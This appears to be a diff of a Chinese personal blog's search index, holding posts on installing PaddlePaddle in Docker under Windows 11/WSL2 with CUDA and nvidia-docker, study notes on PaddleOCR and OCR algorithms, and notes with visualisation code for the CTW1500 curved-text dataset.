    ​ 这时就可以在浏览器中输入 http://localhost:80 进入 JupyterHub

    png

    ​ 这个用户名没说,好坑,查了使用 Docker 安装后,jupyter 的用户名是什么?· Issue #46931 · PaddlePaddle/Paddle (github.com)才知道是 jovyan ……

    关闭容器

    ​ 命令行下 Ctrl+C 解决。

    使用(paddleGPU)

    Nvidia-docker

    ​ 安装 cuda:

    wget https://developer.download.nvidia.com/compute/cuda/repos/wsl-ubuntu/x86_64/cuda-wsl-ubuntu.pin
    sudo mv cuda-wsl-ubuntu.pin /etc/apt/preferences.d/cuda-repository-pin-600
    wget https://developer.download.nvidia.com/compute/cuda/11.4.2/local_installers/cuda-repo-wsl-ubuntu-11-4-local_11.4.2-1_amd64.deb
    sudo dpkg -i cuda-repo-wsl-ubuntu-11-4-local_11.4.2-1_amd64.deb
    sudo apt-key add /var/cuda-repo-wsl-ubuntu-11-4-local/7fa2af80.pub
    sudo apt-get update
    sudo apt-get -y install cuda

    如需在 Linux 开启 GPU 支持,请安装 nvidia-docker

    export PATH=$PATH:/usr/lib/wsl/lib
    distribution=$(. /etc/os-release;echo $ID$VERSION_ID)
    curl -s -L https://nvidia.github.io/nvidia-docker/gpgkey | sudo apt-key add -
    curl -s -L https://nvidia.github.io/nvidia-docker/$distribution/nvidia-docker.list | sudo tee /etc/apt/sources.list.d/nvidia-docker.list
    curl -s -L https://nvidia.github.io/libnvidia-container/experimental/$distribution/libnvidia-container-experimental.list | sudo tee /etc/apt/sources.list.d/libnvidia-container-experimental.list
    sudo apt-get update
    sudo apt-get install -y nvidia-docker2

    nvidia-docker 命令老是不成功,查到 docker 启动容器报错 Unknown runtime specified nvidia. - luwanglin - 博客园 (cnblogs.com) 终于知道发生甚么事了,坑死我了。

    ​ 设置好配置文件,添加 nvidia 属性:

    "runtimes": {
    "nvidia": {
    "path": "/usr/bin/nvidia-container-runtime",
    "runtimeArgs": []
    }
    }

    png

    获取镜像

    ​ 无聊的等待下载时间……妈的 12GB 慢死我了。

    nvidia-docker pull registry.baidubce.com/paddlepaddle/paddle:2.5.1-gpu-cuda10.2-cudnn7.6-trt7.0

    创建容器

    nvidia-docker run --name paddle_gpu_docker -it -v $PWD:/paddle registry.baidubce.com/paddlepaddle/paddle:2.5.1-gpu-cuda10.2-cudnn7.6-trt7.0 /bin/bash

    查看 GPU 是否可用

    import paddle
    paddle.fluid.is_compiled_with_cuda()
    True

    关闭容器

    exit

    第二次使用

    ​ 启动:

    docker start paddle_gpu_docker

    ​ 进入:

    docker attach paddle_gpu_docker
    ]]>
    + 资源

    部署(Windows11 + Wsl2)

    ​ Docker 默认安装在 C 盘并且不可控,在安装前尝试将 Docker 迁移至 D 盘:

    ​ 新建文件夹:C:\Program Files\Docker D:\Program Files\Docker

    ​ 使用管理员权限的 cmd:

    png

    1
    mklink /j "C:\Program Files\Docker" "D:\Program Files\Docker"
    1
    为 C:\Program Files\Docker <<===>> D:\Program Files\Docker 创建的联接

    ​ 从 Docker: Accelerated Container Application Development 整一个 Windows 版本的 Docker。安装之。

    ​ 进设置,把 Resources -> Advanced 里的 Disk image location 移到 D 盘:

    png

    ​ 在 Docker Engine 里,添加 "registry-mirrors": ["https://registry.docker-cn.com", "https://docker.mirrors.ustc.edu.cn"] 以获得镜像加速。

    png

    使用(paddleCPU)

    获取镜像

    ​ 获取镜像,让它下载,等:

    1
    docker pull registry.baidubce.com/paddlepaddle/paddle:2.5.1

    ​ 可以从 paddlepaddle/paddle - Docker Image | Docker Hub 获取更多镜像。

    ​ 等它下载完:

    1
    2
    What's Next?
    View summary of image vulnerabilities and recommendations → docker scout quickview registry.baidubce.com/paddlepaddle/paddle:2.5.1

    png

    创建容器

    1
    docker run --name paddle_docker -it -v $PWD:/paddle registry.baidubce.com/paddlepaddle/paddle:2.5.1 /bin/bash
    • --name paddle_docker:设定 Docker 的名称,paddle_docker 是自己设置的名称;
    • -it:参数说明容器已和本机交互式运行;
    • -v $PWD:/paddle:指定将当前路径(PWD 变量会展开为当前路径的绝对路径)挂载到容器内部的 /paddle 目录;
    • registry.baidubce.com/paddlepaddle/paddle:2.5.1:指定需要使用的 image 名称,您可以通过docker images命令查看;/bin/bash 是在 Docker 中要执行的命令

    png

    ​ 检查是否可用:

    1
    2
    import paddle
    paddle.utils.run_check()

    png

    关闭容器

    1
    exit

    第二次使用

    启动:

    1
    docker start paddle_docker

    进入:

    1
    docker attach paddle_docker

    png

    使用(paddleCPU + jupyter)

    获取镜像

    ​ 案例,拉取 Paddle 镜像(由于 Windows 不可以使用 Nvidia-docker,所以只能装 CPU 版本的),在 powershell 里运行(但是在 Ubuntu 下的子系统居然都可以运行,居然是相通的?):

    1
    docker pull registry.baidubce.com/paddlepaddle/paddle:2.5.1-jupyter

    创建容器

    ​ 装好后,创建容器:

    1
    docker run --name paddle_docker_jupyter -it -v $PWD:/paddle registry.baidubce.com/paddlepaddle/paddle:2.5.1-jupyter /bin/bash
    • --name paddle_docker-jupyter:设定 Docker 的名称,paddle_docker 是自己设置的名称;
    • -it:参数说明容器已和本机交互式运行;
    • -v $PWD:/paddle:指定将当前路径(PWD 变量会展开为当前路径的绝对路径)挂载到容器内部的 /paddle 目录;
    • registry.baidubce.com/paddlepaddle/paddle:2.5.1-jupyter:指定需要使用的 image 名称,您可以通过docker images命令查看;/bin/bash 是在 Docker 中要执行的命令。

    使用容器

    1
    2
    3
    mkdir ./jupyter_docker
    chmod 777 ./jupyter_docker
    cd ./jupyter_docker
    1
    docker run -p 80:80 --rm --env USER_PASSWD="123" -v $PWD:/home/paddle registry.baidubce.com/paddlepaddle/paddle:2.5.1-jupyter
    • --rm:关闭容器后删除容器;
    • --env USER_PASSWD="123":为 jupyter 设置登录密码,123 是自己设置的密码;
    • -v $PWD:/home/paddle:指定将当前路径(PWD 变量会展开为当前路径的绝对路径)挂载到容器内部的 /home/paddle 目录;
    • registry.baidubce.com/paddlepaddle/paddle:2.5.1-jupyter:指定需要使用的 image 名称,您可以通过 docker images 命令查看

    png

    ​ 这时就可以在浏览器中输入 http://localhost:80 进入 JupyterHub

    png

    ​ 这个用户名没说,好坑,查了使用 Docker 安装后,jupyter 的用户名是什么?· Issue #46931 · PaddlePaddle/Paddle (github.com)才知道是 jovyan ……

    关闭容器

    ​ 命令行下 Ctrl+C 解决。

    使用(paddleGPU)

    Nvidia-docker

    ​ 安装 cuda:

    1
    2
    3
    4
    5
    6
    7
    wget https://developer.download.nvidia.com/compute/cuda/repos/wsl-ubuntu/x86_64/cuda-wsl-ubuntu.pin
    sudo mv cuda-wsl-ubuntu.pin /etc/apt/preferences.d/cuda-repository-pin-600
    wget https://developer.download.nvidia.com/compute/cuda/11.4.2/local_installers/cuda-repo-wsl-ubuntu-11-4-local_11.4.2-1_amd64.deb
    sudo dpkg -i cuda-repo-wsl-ubuntu-11-4-local_11.4.2-1_amd64.deb
    sudo apt-key add /var/cuda-repo-wsl-ubuntu-11-4-local/7fa2af80.pub
    sudo apt-get update
    sudo apt-get -y install cuda

    如需在 Linux 开启 GPU 支持,请安装 nvidia-docker

    1
    2
    3
    4
    5
    6
    7
    export PATH=$PATH:/usr/lib/wsl/lib
    distribution=$(. /etc/os-release;echo $ID$VERSION_ID)
    curl -s -L https://nvidia.github.io/nvidia-docker/gpgkey | sudo apt-key add -
    curl -s -L https://nvidia.github.io/nvidia-docker/$distribution/nvidia-docker.list | sudo tee /etc/apt/sources.list.d/nvidia-docker.list
    curl -s -L https://nvidia.github.io/libnvidia-container/experimental/$distribution/libnvidia-container-experimental.list | sudo tee /etc/apt/sources.list.d/libnvidia-container-experimental.list
    sudo apt-get update
    sudo apt-get install -y nvidia-docker2

    nvidia-docker 命令老是不成功,查到 docker 启动容器报错 Unknown runtime specified nvidia. - luwanglin - 博客园 (cnblogs.com) 终于知道发生甚么事了,坑死我了。

    ​ 设置好配置文件,添加 nvidia 属性:

    1
    2
    3
    4
    5
    6
    "runtimes": {
    "nvidia": {
    "path": "/usr/bin/nvidia-container-runtime",
    "runtimeArgs": []
    }
    }

    png

    获取镜像

    ​ 无聊的等待下载时间……妈的 12GB 慢死我了。

    1
    nvidia-docker pull registry.baidubce.com/paddlepaddle/paddle:2.5.1-gpu-cuda10.2-cudnn7.6-trt7.0

    创建容器

    1
    nvidia-docker run --name paddle_gpu_docker -it -v $PWD:/paddle registry.baidubce.com/paddlepaddle/paddle:2.5.1-gpu-cuda10.2-cudnn7.6-trt7.0 /bin/bash

    查看 GPU 是否可用

    1
    2
    import paddle
    paddle.fluid.is_compiled_with_cuda()
    1
    True

    关闭容器

    1
    exit

    第二次使用

    ​ 启动:

    1
    docker start paddle_gpu_docker

    ​ 进入:

    1
    docker attach paddle_gpu_docker
    ]]>
    @@ -5515,7 +5515,7 @@ /posts/Paddle-%E5%8A%A8%E6%89%8B%E5%AD%A6%20OCR/ - 资源

    https://pan.baidu.com/s/1e3Iu69dMDE_A38qAMgvJhg 提取码: obf3

    2 序言

    jpg

    3 如何使用本书

    教你怎么安装 PaddleOCR。

    • ~~paddlepaddle CPU 版本(智算中心的 NPU 连华为工作人员都搞不定,只好用 CPU 了)~~还是寄,绝!
    conda create -n PaddleOCR python=3.7
    source activate PaddleOCR
    python -m pip install paddlepaddle==2.4.2 -i https://mirror.baidu.com/pypi/simple
    • paddlepaddle GPU 版本(就在自己的 Ubuntu 下装了)寄了
    conda create -n PaddleOCR python=3.7
    conda activate PaddleOCR
    python -m pip install paddlepaddle-gpu==2.4.2 -i https://mirror.baidu.com/pypi/simple
    • 安装 paddleocr
    pip install --upgrade pip
    pip install paddleocr
    • 安装 Jupyter Notebook:
    sudo apt update 
    sudo apt upgrade
    sudo apt install python3-pip
    sudo pip3 install --upgrade pip
    sudo pip3 install notebook

    运行 Jupyter Notebook:

    jupyter notebook

    会得到一串 url,用 Windows 下的浏览器打开它:

    jpg

    https://github.com/PaddlePaddle/PaddleOCR 里加载仓库,然后:

    cd PaddleOCR
    pip install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple

    4 OCR 技术导论

    4.1 OCR 技术的应用场景

    目前常说的 OCR 一般指场景文字识别(Scene Text Recognition,STR),主要面向自然
    场景。

    4.2 OCR 前沿算法

    4.2.1 文本检测

    jpg

    4.2.2 文本识别

    规则文本识别的算法根据解码方式的不同可以大致分为基于 CTCSequence2Sequence 两种,将网络学习到的序列特征转化为最终的识别结果的处理方式不同。

    CTC 全称 Connectionist temporal classification,是一种常用在语音识别、文本识别等领域的算法,用来解决输入和输出序列长度不一、无法对齐的问题。

    jpg

    4.2.3 文档结构化识别

    • 版面分析

    jpg

    • 表格识别

    jpg

    • 关键信息提取(KIE)

    jpg

    4.3.2 产业级 OCR 开发套件 PaddleOCR

    jpg

    • 模型算法
      • 4 种文本检测算法
      • 8 种文本识别算法
      • 1 种端到端文本识别算法
    • 预训练模型库
      • PP-OCR,包含了 3 个模块,分别是:文本检测模块、检测框矫正模块、文本识别模块
      • PP-Structure,支持版面分析(layout analysis)、表格识别(table recognition)、文档视觉问答(DocVQA)三种子任务
    • 工业级部署
      • 基于 Paddle Inference 的服务器端预测方案
    • 数据工具
      • 半自动数据标注工具 PPOCRLabel
      • 数据合成工具 Style-Text

    5 文本检测

    5.1 文本检测方法介绍

    jpg

    5.1.1 基于回归的文本检测

    基于回归文本检测方法和目标检测算法的方法相似,文本检测方法只有两个类别,图像中的文本视为待检测的目标,其余部分视为背景。

    • 水平文本检测

      • TextBoxes

      • CTPN

    • 任意角度文本检测

      • TextBoxes++
      • EAST
      • MOST
    • 弯曲文本检测

      • CTD
      • LOMO
      • Contournet
      • PCR

    5.1.2 基于分割的文本检测

    基于回归的方法虽然在文本检测上取得了很好的效果,但是对解决弯曲文本往往难以得到平滑的文本包围曲线,并且模型较为复杂不具备性能优势。于是研究者们提出了基于图像分割的文本分割方法,先从像素层面做分类,判别每一个像素点是否属于一个文本目标,得到文本区域的概率图,通过后处理方式得到文本分割区域的包围曲线。

    jpg

    此类方法通常是基于分割的方法实现文本检测,基于分割的方法对不规则形状的文本检测有着天然的优势。
    基于分割的文本检测方法主体思想为,通过分割方法得到图像中文本区域,再利用 opencv,polygon 等后处理得到文本区域的最小包围曲线。

    • Pixellink
    • MSR
    • PSENet
    • Seglink++
    • PAN
    • DBNet,针对基于分割的方法需要使用阈值进行二值化处理而导致后处理耗时的问题
    • FCENet,将文本包围曲线用傅立叶变换的参数表示

    5.2 文本检测算法 DBNet 实战

    5.2.1 快速使用

    wsl2 下安装失败,我的 CUDA 版本太新了。

    安装 paddleocr whl 包:

    pip install --upgrade pip
    pip install paddleocr -i https://pypi.tuna.tsinghua.edu.cn/simple

    命令行调用文本检测模型预测图像 ./test.jpg

    # --image_dir 指向要预测的图像路径--rec false 表示不使用识别识别,只执行文本检测
    ! paddleocr --image_dir ./test.jpg --rec false

    然后就会喜提错误 ImportError: libcudart.so.10.2: cannot open shared object file: No such file or directory。因为自己的 CUDA 是 11.5 的,没有 10.2 的 libcudart.so.10.2

    报错解决:libcudart.so.10.2: cannot open shared object file: No such file or directory_Love 绘梨衣的 Mr.lu 的博客-CSDN 博客 里下载 libcudart.so.10.2,并把它放到 cuda 的安装目录中。

    jpg

    sudo cp -i libcudart.so.10.2 /usr/lib/cuda/lib64

    配置 $LD_LIBRARY_PATH

    export LD_LIBRARY_PATH=/usr/lib/cuda/lib64:$LD_LIBRARY_PATH

    发现这个电脑连 CUDNN 都没装?giao

    cuDNN Download | NVIDIA Developer 下载 CUDNN,还必须是 10.2 的,得到 cudnn-10.2-linux-x64-v7.6.5.32.tgz,解压之:

    tar -zxvf cudnn-10.2-linux-x64-v7.6.5.32.tgz 

    然后复制这些文件到 CUDA 的目录下:

    sudo cp cuda/lib64/* /usr/lib/cuda/lib64
    sudo cp cuda/include/* /usr/lib/cuda/include/

    5.2.2 DBNet 算法详解

    DB 文本检测模型可以分为三个部分:

    • Backbone 网络,负责提取图像的特征
    • FPN 网络,特征金字塔结构增强特征
    • Head 网络,计算文本区域概率图

    6 文本识别

    根据实际场景可以把文本识别任务分为两个大类:

    • 规则文本识别:主要指印刷字体、扫描文本等,认为文本大致处在水平线位置
    • 不规则文本识别:往往出现在自然场景中,且由于文本曲率、方向、变形等方面差异巨大,文字往往不在水平位置,存在弯曲、遮挡、模糊等问题。

    jpg

    6.1 文本识别方法介绍

    • 算法流程
      • 图像预处理
      • 字符分割
      • 字符识别

    jpg

    6.1.1 规则文本识别

    • CTC
      • CRNN
    • Seq2Seq

    jpg

    6.1.2 不规则文本识别

    • 基于矫正,利用一些视觉变换模块,将非规则的文本尽量转换为规则文本,然后使用常规方法进行识别。
      • RARE
    • 基于 Attention,主要关注的是序列之间各部分的相关性,该方法最早在机器翻译领域提出,认为在文本翻译的过程中当前词的结果主要由某几个单词影响的,因此需要给有决定性的单词更大的权重。
      • R^2AM
    • 基于分割,基于分割的方法是将文本行的各字符作为独立个体,相比与对整个文本行做矫正后识别,识别分割出的单个字符更加容易。
      • FCN
    • 基于 Transformer
      • SRN
      • NRTR
      • SRACN

    6.2 文本识别算法 CRNN 实战

    7 PP-OCR 系统及优化策略

    7.1.1 PP-OCR 系统与优化策略简介

    • 使用文本检测方法,获取文本区域多边形信息(PP-OCR 中文本检测使用的是 DBNet,因此获取的是四点信息)。
    • 对上述文本多边形区域进行裁剪与透视变换校正,将文本区域转化成矩形框,再使用方向分类器对方向进行校正。
    • 基于包含文字区域的矩形框进行文本识别,得到最终识别结果。
    ]]>
    + 资源

    https://pan.baidu.com/s/1e3Iu69dMDE_A38qAMgvJhg 提取码: obf3

    2 序言

    jpg

    3 如何使用本书

    教你怎么安装 PaddleOCR。

    • ~~paddlepaddle CPU 版本(智算中心的 NPU 连华为工作人员都搞不定,只好用 CPU 了)~~还是寄,绝!
    1
    2
    3
    conda create -n PaddleOCR python=3.7
    source activate PaddleOCR
    python -m pip install paddlepaddle==2.4.2 -i https://mirror.baidu.com/pypi/simple
    • paddlepaddle GPU 版本(就在自己的 Ubuntu 下装了)寄了
    1
    2
    3
    conda create -n PaddleOCR python=3.7
    conda activate PaddleOCR
    python -m pip install paddlepaddle-gpu==2.4.2 -i https://mirror.baidu.com/pypi/simple
    • 安装 paddleocr
    1
    2
    pip install --upgrade pip
    pip install paddleocr
    • 安装 Jupyter Notebook:
    1
    2
    3
    4
    5
    sudo apt update 
    sudo apt upgrade
    sudo apt install python3-pip
    sudo pip3 install --upgrade pip
    sudo pip3 install notebook

    运行 Jupyter Notebook:

    1
    jupyter notebook

    会得到一串 url,用 Windows 下的浏览器打开它:

    jpg

    https://github.com/PaddlePaddle/PaddleOCR 里加载仓库,然后:

    1
    2
    cd PaddleOCR
    pip install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple

    4 OCR 技术导论

    4.1 OCR 技术的应用场景

    目前常说的 OCR 一般指场景文字识别(Scene Text Recognition,STR),主要面向自然
    场景。

    4.2 OCR 前沿算法

    4.2.1 文本检测

    jpg

    4.2.2 文本识别

    规则文本识别的算法根据解码方式的不同可以大致分为基于 CTCSequence2Sequence 两种,将网络学习到的序列特征转化为最终的识别结果的处理方式不同。

    CTC 全称 Connectionist temporal classification,是一种常用在语音识别、文本识别等领域的算法,用来解决输入和输出序列长度不一、无法对齐的问题。

    jpg

    4.2.3 文档结构化识别

    • 版面分析

    jpg

    • 表格识别

    jpg

    • 关键信息提取(KIE)

    jpg

    4.3.2 产业级 OCR 开发套件 PaddleOCR

    jpg

    • 模型算法
      • 4 种文本检测算法
      • 8 种文本识别算法
      • 1 种端到端文本识别算法
    • 预训练模型库
      • PP-OCR,包含了 3 个模块,分别是:文本检测模块、检测框矫正模块、文本识别模块
      • PP-Structure,支持版面分析(layout analysis)、表格识别(table recognition)、文档视觉问答(DocVQA)三种子任务
    • 工业级部署
      • 基于 Paddle Inference 的服务器端预测方案
    • 数据工具
      • 半自动数据标注工具 PPOCRLabel
      • 数据合成工具 Style-Text

    5 文本检测

    5.1 文本检测方法介绍

    jpg

    5.1.1 基于回归的文本检测

    基于回归文本检测方法和目标检测算法的方法相似,文本检测方法只有两个类别,图像中的文本视为待检测的目标,其余部分视为背景。

    • 水平文本检测

      • TextBoxes

      • CTPN

    • 任意角度文本检测

      • TextBoxes++
      • EAST
      • MOST
    • 弯曲文本检测

      • CTD
      • LOMO
      • Contournet
      • PCR

    5.1.2 基于分割的文本检测

    基于回归的方法虽然在文本检测上取得了很好的效果,但是对解决弯曲文本往往难以得到平滑的文本包围曲线,并且模型较为复杂不具备性能优势。于是研究者们提出了基于图像分割的文本分割方法,先从像素层面做分类,判别每一个像素点是否属于一个文本目标,得到文本区域的概率图,通过后处理方式得到文本分割区域的包围曲线。

    jpg

    此类方法通常是基于分割的方法实现文本检测,基于分割的方法对不规则形状的文本检测有着天然的优势。
    基于分割的文本检测方法主体思想为,通过分割方法得到图像中文本区域,再利用 opencv,polygon 等后处理得到文本区域的最小包围曲线。

    • Pixellink
    • MSR
    • PSENet
    • Seglink++
    • PAN
    • DBNet,针对基于分割的方法需要使用阈值进行二值化处理而导致后处理耗时的问题
    • FCENet,将文本包围曲线用傅立叶变换的参数表示

    5.2 文本检测算法 DBNet 实战

    5.2.1 快速使用

    wsl2 下安装失败,我的 CUDA 版本太新了。

    安装 paddleocr whl 包:

    1
    2
    pip install --upgrade pip
    pip install paddleocr -i https://pypi.tuna.tsinghua.edu.cn/simple

    命令行调用文本检测模型预测图像 ./test.jpg

    1
    2
    # --image_dir 指向要预测的图像路径--rec false 表示不使用识别识别,只执行文本检测
    ! paddleocr --image_dir ./test.jpg --rec false

    然后就会喜提错误 ImportError: libcudart.so.10.2: cannot open shared object file: No such file or directory。因为自己的 CUDA 是 11.5 的,没有 10.2 的 libcudart.so.10.2

    报错解决:libcudart.so.10.2: cannot open shared object file: No such file or directory_Love 绘梨衣的 Mr.lu 的博客-CSDN 博客 里下载 libcudart.so.10.2,并把它放到 cuda 的安装目录中。

    jpg

    1
    sudo cp -i libcudart.so.10.2 /usr/lib/cuda/lib64

    配置 $LD_LIBRARY_PATH

    1
    export LD_LIBRARY_PATH=/usr/lib/cuda/lib64:$LD_LIBRARY_PATH

    发现这个电脑连 CUDNN 都没装?giao

    cuDNN Download | NVIDIA Developer 下载 CUDNN,还必须是 10.2 的,得到 cudnn-10.2-linux-x64-v7.6.5.32.tgz,解压之:

    1
    tar -zxvf cudnn-10.2-linux-x64-v7.6.5.32.tgz 

    然后复制这些文件到 CUDA 的目录下:

    1
    2
    sudo cp cuda/lib64/* /usr/lib/cuda/lib64
    sudo cp cuda/include/* /usr/lib/cuda/include/

    5.2.2 DBNet 算法详解

    DB 文本检测模型可以分为三个部分:

    • Backbone 网络,负责提取图像的特征
    • FPN 网络,特征金字塔结构增强特征
    • Head 网络,计算文本区域概率图

    6 文本识别

    根据实际场景可以把文本识别任务分为两个大类:

    • 规则文本识别:主要指印刷字体、扫描文本等,认为文本大致处在水平线位置
    • 不规则文本识别:往往出现在自然场景中,且由于文本曲率、方向、变形等方面差异巨大,文字往往不在水平位置,存在弯曲、遮挡、模糊等问题。

    jpg

    6.1 文本识别方法介绍

    • 算法流程
      • 图像预处理
      • 字符分割
      • 字符识别

    jpg

    6.1.1 规则文本识别

    • CTC
      • CRNN
    • Seq2Seq

    jpg

    6.1.2 不规则文本识别

    • 基于矫正,利用一些视觉变换模块,将非规则的文本尽量转换为规则文本,然后使用常规方法进行识别。
      • RARE
    • 基于 Attention,主要关注的是序列之间各部分的相关性,该方法最早在机器翻译领域提出,认为在文本翻译的过程中当前词的结果主要由某几个单词影响的,因此需要给有决定性的单词更大的权重。
      • R^2AM
    • 基于分割,基于分割的方法是将文本行的各字符作为独立个体,相比与对整个文本行做矫正后识别,识别分割出的单个字符更加容易。
      • FCN
    • 基于 Transformer
      • SRN
      • NRTR
      • SRACN

    6.2 文本识别算法 CRNN 实战

    7 PP-OCR 系统及优化策略

    7.1.1 PP-OCR 系统与优化策略简介

    • 使用文本检测方法,获取文本区域多边形信息(PP-OCR 中文本检测使用的是 DBNet,因此获取的是四点信息)。
    • 对上述文本多边形区域进行裁剪与透视变换校正,将文本区域转化成矩形框,再使用方向分类器对方向进行校正。
    • 基于包含文字区域的矩形框进行文本识别,得到最终识别结果。
    ]]>
    @@ -5776,7 +5776,7 @@ /posts/Paper-Detecting%20Curve%20Text%20in%20the%20Wild-New%20Dataset%20and%20New%20Solution/ - 资源

    正文

    Abstract

    提出了:

    • 一个数据集 CTW 1500(1000 张用于训练,500 张用于测试)

    • 基于该数据集提出了一种基于多边形的曲线文本检测器(CTD)

    1 Introduction

    png

    目前的数据集很少有曲线文本,用四边形标记这种文本是有缺陷的,更不用说矩形了。例如,如图 1 所示,使用曲线边界框有三个显著的优点:

    • 避免重叠
    • 减小背景噪声
    • 避免使用多个文本行

    对于所有类型的曲线文本区域,一个 14 点的多边形就足以定位它们。

    在所提出的数据集上,结果表明,具有轻度减少的 resnet-50 的 CTD 可以有效地检测曲线文本。

    目前的技术检测曲线文本都不好使。

    3. CTW1500 Dataset and Annotation

    Data decription

    数据描述。CTW1500 数据集包含

    • 1500 幅图像
    • 10751 个边界框(3530 个是曲线边界框)
    • 每幅图像至少一个曲线文本。
    • 多语言,主要包含中文和英文

    Annotation

    png

    为了包围曲线文本,我们创建了十条等距的参考线来帮助标记额外的 10 个点(我们实际上发现额外的 10 点足以标记所有类型的曲线文本)。我们使用等距线的原因是为了简化标注工作,并减少主观干扰。

    一个曲线文本比标记四边形文本消耗大约三倍的时间。

    4.1. Network Architecture

    png

    我们 CTD 的总体架构如图 4 所示,可分为三个部分:backbone、RPN 和 regression module。

    • backbone 通常采用 ImageNet 预先训练的流行模型,然后使用相应的模型进行微调,如 VGG-16、ResNet 等。区域建议网络(RPN)和回归模块分别连接到主干;
    • RPN 生成粗略回忆文本的建议;
    • regression module 对建议进行微调,使其更加紧凑。

    4.2. Recurrent Transverse and Longitudinal Offset Connection (TLOC)

    4.3. Long Side Interpolation

    4.4. Polygonal Post Processing

    非多边形抑制(NPS)。误报检测结果是制约文本检测性能的重要原因之一。

    多边形非最大值抑制(PNMS)。非极大值抑制被证明对目标检测任务非常有效。

    5. Experiments

    提出的模型有效。

    6. Conclusions and Future Work

    数据集

    Yuliang-Liu/Curve-Text-Detector: This repository provides train&test code, dataset, det.&rec. annotation, evaluation script, annotation tool, and ranking. (github.com) 下载数据集:

    • train_images.zip 训练集图像(1000 张)
    • ctw1500_train_labels.zip(训练集图像的标注文件,xml 格式)
    • test_images.zip 测试集图像(500 张)
    • gt_ctw1500.zip(测试集图像的标注文件,txt 格式)

    可视化训练集图像的代码:

    import xml.etree.ElementTree as ET

    index = 997

    # 定义路径
    image_dir = r'E:\dataset\CTW1500\ctw1500\train_images\\'
    label_dir = r"E:\dataset\CTW1500\ctw1500\ctw1500_train_labels\\"

    image_path = os.path.join(image_dir, "{:04d}".format(index) + '.jpg')
    label_path = os.path.join(label_dir, "{:04d}".format(index) + '.xml')

    image_origin = cv2.imread(image_path)
    image = image_origin.copy()
    height, width, _ = image.shape

    # 解析 XML 文件
    tree = ET.parse(label_path)
    root = tree.getroot()

    # 遍历每个图像
    for image_elem in root.findall("image"):
    file_name = image_elem.get("file")

    # 遍历每个标注框
    for box_elem in image_elem.findall("box"):
    box_height = int(box_elem.get('height'))
    box_width = int(box_elem.get('width'))
    box_left = int(box_elem.get('left'))
    box_top = int(box_elem.get('top'))

    print(f"Box height: {box_height}")
    print(f"Box width: {box_width}")
    print(f"Box left: {box_left}")
    print(f"Box top: {box_top}")

    # 读取 <segs> 的值并以逗号分割成列表
    segs = box_elem.find('./segs')
    segs_values = segs.text.split(',')

    segs_x = []
    segs_y = []
    print("Segments:")
    for i in range(0, len(segs_values), 2):
    segs_x.append(int(segs_values[i]))
    segs_y.append(int(segs_values[i+1]))
    segs = np.array([segs_x, segs_y], np.int32).T
    print(f"segs_x: {segs_x}, y: {segs_y}")

    transcriptions = box_elem.find("label").text

    # 获取所有 pts 标签
    pts_elems = box_elem.findall("pts")

    # 提取坐标信息
    pts_x = []
    pts_y = []
    for pts_elem in pts_elems:
    pts_x.append(int(pts_elem.get("x")))
    pts_y.append(int(pts_elem.get("y")))
    pts = np.array([pts_x, pts_y], np.int32).T
    # 打印标注信息
    print("File: ", file_name)
    print("Transcriptions: ", transcriptions)
    print("Points: ", pts)

    # 画图
    cv2.rectangle(image, (box_left, box_top), (box_left + box_width, box_top + box_height), (255, 255, 0), thickness=2)
    cv2.polylines(image, [segs], isClosed=False, color=(255, 255, 255), thickness=2)
    cv2.polylines(image, [pts], isClosed=False, color=(255, 0, 0), thickness=2)

    for p in pts:
    cv2.circle(image, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)

    cv2.putText(image, transcriptions, (pts_x[0], pts_y[0] - int(min(height, width) / 150)), cv2.FONT_HERSHEY_SIMPLEX,
    min(height, width) / 1000, (0, 255, 0), int(min(height, width) / 500))

    fig, axes = plt.subplots(nrows=1, ncols=2, figsize=(16, 9))
    axes = axes.flatten()

    axes[0].imshow(cv2.cvtColor(image_origin, cv2.COLOR_BGR2RGB))
    axes[0].axis('off')
    axes[0].set_title('Origin')

    axes[1].imshow(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))
    axes[1].axis('off')
    axes[1].set_title('Annotation')

    plt.tight_layout()
    plt.show()
    Box height: 108
    Box width: 565
    Box left: 201
    Box top: 351
    Segments:
    segs_x: [216, 302, 389, 476, 563, 651, 739, 766, 671, 576, 482, 388, 294, 201], y: [351, 383, 398, 407, 409, 391, 363, 406, 440, 458, 459, 451, 432, 398]
    File: 0997.jpg
    Transcriptions: VIOLENCE NEVER BRINGS
    Points: [[228 381]
    [245 390]
    [268 395]
    [289 406]
    [323 415]
    [352 422]
    [388 426]
    [417 431]
    [439 432]
    [473 436]
    [508 434]
    [540 433]
    [566 432]
    [601 429]
    [616 425]
    [634 421]
    [666 414]
    [683 406]
    [697 402]
    [722 392]
    [741 387]]
    Box height: 111
    Box width: 529
    Box left: 228
    Box top: 434
    Segments:
    segs_x: [251, 331, 411, 491, 571, 651, 731, 757, 669, 581, 493, 405, 316, 228], y: [437, 460, 474, 484, 479, 459, 434, 489, 528, 540, 545, 533, 522, 499]
    File: 0997.jpg
    Transcriptions: PERMANENT PEACE
    Points: [[259 475]
    [290 484]
    [319 487]
    [358 495]
    [396 505]
    [435 507]
    [472 511]
    [505 512]
    [543 513]
    [578 506]
    [613 499]
    [645 493]
    [682 481]
    [709 471]
    [731 464]]
    Box height: 96
    Box width: 37
    Box left: 466
    Box top: 127
    Segments:
    segs_x: [501, 501, 501, 502, 502, 502, 503, 466, 466, 466, 467, 467, 467, 468], y: [127, 143, 159, 175, 191, 207, 223, 220, 204, 189, 173, 158, 142, 127]
    File: 0997.jpg
    Transcriptions: LOC
    Points: [[486 141]
    [484 168]
    [485 205]]

    png

    可视化测试集图像的代码:

    import cv2
    import os
    import matplotlib.pyplot as plt

    index = 1200

    image_dir = r'E:\dataset\CTW1500\ctw1500\test_images\\'
    label_dir = r'E:\dataset\CTW1500\ctw1500\gt_ctw1500\\'

    image_path = os.path.join(image_dir, "{:04d}".format(index) + '.jpg')
    label_path = os.path.join(label_dir, "{:07d}".format(index) + '.txt')

    image_origin = cv2.imread(image_path)
    image = image_origin.copy()
    height, width, _ = image.shape
    label_file = open(label_path, 'r')
    annotations = label_file.readlines()
    label_file.close()

    for annotation in annotations:
    coords_text = annotation.strip().split(',####')
    coords = list(map(int, coords_text[0].split(',')))
    points = np.array([(coords[i], coords[i+1]) for i in range(0, len(coords), 2)])
    transcriptions = coords_text[1]

    cv2.polylines(image, [points], isClosed=True, color=(255, 0, 0), thickness=2)

    for p in points:
